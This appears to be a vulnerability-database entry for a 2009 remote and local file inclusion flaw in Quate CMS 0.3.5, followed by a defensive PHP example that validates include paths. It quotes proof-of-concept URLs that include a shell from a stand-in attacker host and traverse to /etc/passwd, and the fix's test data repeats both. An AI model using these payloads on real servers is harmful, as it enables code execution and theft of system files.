Vendor: Quate CMS
By: cr4wl3r
CVSS: 9.3 (HIGH)
Vulnerability Type: Remote File Inclusion (RFI) and Local File Inclusion (LFI)
CWE: 98
Product Name: Quate CMS
Affected Version From: 2000.3.5
Affected Version To: 2000.3.5
Patch Exists: YES
Related CWE: N/A
CPE: a:quate_cms:quate_cms:0.3.5
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

Quate CMS <= 0.3.5 (RFI/LFI) Multiple Remote Vulnerability

Quate CMS version 0.3.5 is vulnerable to Remote File Inclusion (RFI) and Local File Inclusion (LFI) attacks. The vulnerability exists in the admin/includes/header.php and admin/includes/footer.php files. An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to the vulnerable server. The malicious request can include a URL to a malicious file hosted on a remote server, which will be included in the vulnerable page. This can allow an attacker to execute arbitrary code on the vulnerable server.

Mitigation:

Upgrade to the latest version of Quate CMS. Additionally, ensure that all user input is properly sanitized and validated.

Exploit-DB raw data:

   [ Discovered by cr4wl3r \ cr4wl3r[4t]linuxmail[dot]org ]

########################################################################
#Quate CMS <= 0.3.5 (RFI/LFI) Multiple Remote Vulnerability
#Download Script      :  http://quate.net/quatecms
#Dork                 :  die("lamers attempt");  :P
########################################################################
#
#Vuln RFI : ./QuateCMS_035/admin/includes/header.php (line 27)
#       <?php
#         if ($bypass_restrict != 1) {
#            require_once($secure_page_path. "includes/secure.php");
#         }
#       ?>
#PoC  :  http://[target]/[path]/admin/includes/header.php?secure_page_path=http://[attacker]/shell.txt???
#
#
#########################################################################
#
#Vuln LFI : ./QuateCMS_035/admin/includes/footer.php (line 4)
#       <?PHP
#           if ($not_logged_in != 1) {
#             if (file_exists("includes/themes/" .$row_secure['account_theme']. "/footer.php")) {
#              require_once("themes/" .$row_secure['account_theme']. "/footer.php");
#        ?>
#PoC   :  http://[target]/[path]/admin/includes/footer.php?row_secure[account_theme]=../../../../../../etc/passwd%00
#
########################################################################
########################################################################
####################[90r0nt4l0 und3r9r0nd c0mmun1ty]####################
########################################################################
########################################################################

   [ Gorontalo / 2009 ]
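
The mitigation advice above, applied to the two `require_once` calls quoted in the advisory: neither path is built from a variable that a request can set. This is an added example, not code from Quate CMS or from the advisory author; the function names, the assumed location of secure.php and the demo directory are assumptions.

```php
<?php
// Added example, not Quate CMS code: path handling for the two includes.
declare(strict_types=1);

// Assumption: secure.php sits beside header.php in admin/includes/.
// The path is anchored to this file's directory; no variable takes part.
function secure_page_file(): string
{
    return __DIR__ . '/secure.php';
}

// Return the real path of <themesDir>/<theme>/footer.php, or null when the
// theme name is unsafe or the file does not resolve inside <themesDir>.
function theme_footer_path(string $themesDir, $theme): ?string
{
    // Rejects arrays, NUL bytes, slashes, dots and URL schemes in one test.
    if (!is_string($theme) || preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $theme) !== 1) {
        return null;
    }
    $base = realpath($themesDir);
    $file = realpath($themesDir . '/' . $theme . '/footer.php');
    if ($base === false || $file === false) {
        return null;                       // missing directory or file
    }
    // Containment check: also catches a theme directory that is a symlink out.
    $prefix = $base . DIRECTORY_SEPARATOR;
    return strncmp($file, $prefix, strlen($prefix)) === 0 ? $file : null;
}

// Constructed demo data: a throwaway themes directory holding one theme.
$themes = sys_get_temp_dir() . '/quate_demo_' . bin2hex(random_bytes(4));
mkdir($themes . '/default', 0700, true);
file_put_contents($themes . '/default/footer.php', "<?php // demo footer\n");

$inputs = [
    'default',                              // stored theme name, accepted
    "../../../../../../etc/passwd\0",       // traversal value from the PoC
    'http://example.invalid/shell.txt',     // URL, placeholder host
    ['default'],                            // array-typed parameter
];
foreach ($inputs as $input) {
    $path = theme_footer_path($themes, $input);
    echo json_encode($input), ' => ', $path ?? 'rejected', PHP_EOL;
}

unlink($themes . '/default/footer.php');
rmdir($themes . '/default');
rmdir($themes);
```

In footer.php the returned path would be passed to `require_once` only when it is not null, with the theme name read from the authenticated account record rather than from the request.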